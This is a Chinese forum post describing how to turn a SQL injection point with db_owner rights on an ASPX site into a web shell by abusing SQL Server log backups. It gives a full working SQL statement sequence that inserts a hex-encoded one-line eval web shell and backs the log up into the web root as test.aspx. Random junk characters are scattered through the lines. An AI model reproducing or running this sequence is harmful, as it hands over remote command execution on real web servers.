最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。' N0 k) t+ g0 l- U' a8 V8 G: `
但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
: d: I4 C, Q0 x# u% N经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。8 H* T7 h6 K) x- v4 s6 R
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。
8 [( H6 j/ S* F1 [- {; |# ?: Q( ?5 I+ G( O' V$ m6 l2 @, e6 Q
--------------------------------------------------------------; \! N) t w# {9 {7 z! l- h1 {
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
+ a4 M h" _- K+ M+ i自己修改备份语句如下:
2 f" v0 c: p6 tDrop table cmd;-- \1 n1 }% _2 `; t) [* P* u, ` `
alter database db_test set RECOVERY FULL;--
+ D+ j% u& a5 a( m6 F6 t5 V0 e: Icreate table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
. N% r2 b7 G; H, g( Ubackup log db_test to disk = 'c:\bak' with init;--! I' B$ T% L4 G) }
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
6 c( Y; l9 M" Y, X6 t% }delete from cmd where id>1;--删除id>1的数据& R% h5 ]% P( [- e
backup log db_test to disk = 'e:\webroot\test.aspx';--
0 v' l z: [5 ]; p% N) o; g& N% jDrop table cmd;--1 R' e1 ]5 v9 e0 T/ Q% y
希望对大家有用。 |